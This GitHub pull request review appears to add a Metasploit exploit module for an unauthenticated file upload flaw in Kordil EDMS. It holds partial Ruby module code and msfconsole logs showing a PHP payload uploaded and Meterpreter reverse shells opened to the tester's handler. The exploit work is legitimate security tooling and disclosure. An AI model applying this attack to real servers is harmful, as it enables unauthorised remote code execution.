Add Kordil EDMS File Upload Vulnerability exploit #1512

Merged
merged 1 commit into from Feb 25, 2013

Projects

None yet

4 participants

@bcoles
Contributor
bcoles commented Feb 22, 2013

Add Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability exploit module.

@brandonprry brandonprry commented on the diff Feb 22, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.
+ This application has an upload feature that allows an unauthenticated user
+ to upload arbitrary files to the '/kordil_edms/userpictures/' directory.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
+ ],
+ 'References' =>
+ [
+ #['OSVDB', ''],
@brandonprry
brandonprry Feb 22, 2013 Contributor

No references?

@bcoles
bcoles Feb 22, 2013 Contributor

This software hasn't been updated since 2010.

Woody Hughes from Ingress Security discovered and reported multiple blind SQL injection vulnerabilities in Kordil EDMS in December 2012:

These issues haven't been patched.

To the best of my knowledge this file upload vulnerability (one of at least 5 in Kordil EDMS) has not been reported previously.

@brandonprry
brandonprry Feb 22, 2013 Contributor

You can hit up moderators@osvdb.org and get an OSVDB entry at least.

@bcoles
bcoles Feb 23, 2013 Contributor

Reported

@brandonprry
brandonprry Feb 23, 2013 Contributor

Cool, I think this will be ready to merge when we get the OSVDB number. Will just need another pair of eyes to look over it for consistency. (like @jvazquez-r7)

@wchen-r7
wchen-r7 Feb 25, 2013 Contributor

Still no reference, I'll just go ahead and publish anyway, but will keep an eye out for this. Or let us know if you have a reference we can use.

@brandonprry
Contributor

I am not actually able to repro this:

bperry@w00den-pickle:~/Projects/brandonprry_msf$ ./msfconsole --quiet
msf > use exploit/multi/http/kordil-edms-upload-exec
msf exploit(kordil-edms-upload-exec) > set RHOST 192.168.1.62
RHOST => 192.168.1.62
msf exploit(kordil-edms-upload-exec) > check
[+] The target is vulnerable.
msf exploit(kordil-edms-upload-exec) > exploit

[] Started reverse handler on 192.168.1.31:4444
[
] 192.168.1.62:80 - Uploading PHP payload (1315 bytes)
[-] Exploit failed [unexpected-reply]: 192.168.1.62:80 - Uploading PHP payload failed
[*] Exploit completed, but no session was created.

Thoughts?

@brandonprry
Contributor

Bah, didn't have perms right.

msf exploit(kordil-edms-upload-exec) > exploit

[] Started reverse handler on 192.168.1.31:4444
[
] 192.168.1.62:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.62:80 - File uploaded successfully
[] 192.168.1.62:80 - Executing payload (userpictures/3626128.php)
[
] Sending stage (39217 bytes) to 192.168.1.62
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.62:35437) at Fri Feb 22 13:46:04 -0600 2013
id

meterpreter >

@todb-r7 todb-r7 commented on the diff Feb 25, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 22 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
+ ], self.class)
+ end
+
+ def check
+
+ base = target_uri.path
@todb-r7
todb-r7 Feb 25, 2013 Contributor

this should use normalize_uri to catch those pesky extra slashes.

base = normalize_uri(target_uri.path)

At least, most other http modules do this now.

@todb-r7 todb-r7 commented on the diff Feb 25, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ return res
+ end
+
+ def on_new_session(client)
+ if client.type == "meterpreter"
+ client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+ client.fs.file.rm("#{@fname}.php")
+ else
+ client.shell_command_token("rm #{@fname}.php")
+ end
+ end
+
+
+ def exploit
+
+ base = target_uri.path
@todb-r7
todb-r7 Feb 25, 2013 Contributor

same here. normalize_uri.

FWIW, target_uri.path should do this for you, it's silly to have to type it.

@wchen-r7
Contributor

Tested:

msf  exploit(kordil-edms-upload-exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.83:4444 
[*] 192.168.1.72:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.72:80 - File uploaded successfully
[*] 192.168.1.72:80 - Executing payload (userpictures/2364926.php)
[*] Sending stage (39217 bytes) to 192.168.1.72
[*] Meterpreter session 1 opened (192.168.1.83:4444 -> 192.168.1.72:45529) at 2013-02-25 12:57:46 -0600
@wchen-r7 wchen-r7 merged commit 0026543 into rapid7:master Feb 25, 2013

1 check passed

default The Travis build passed
Details
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment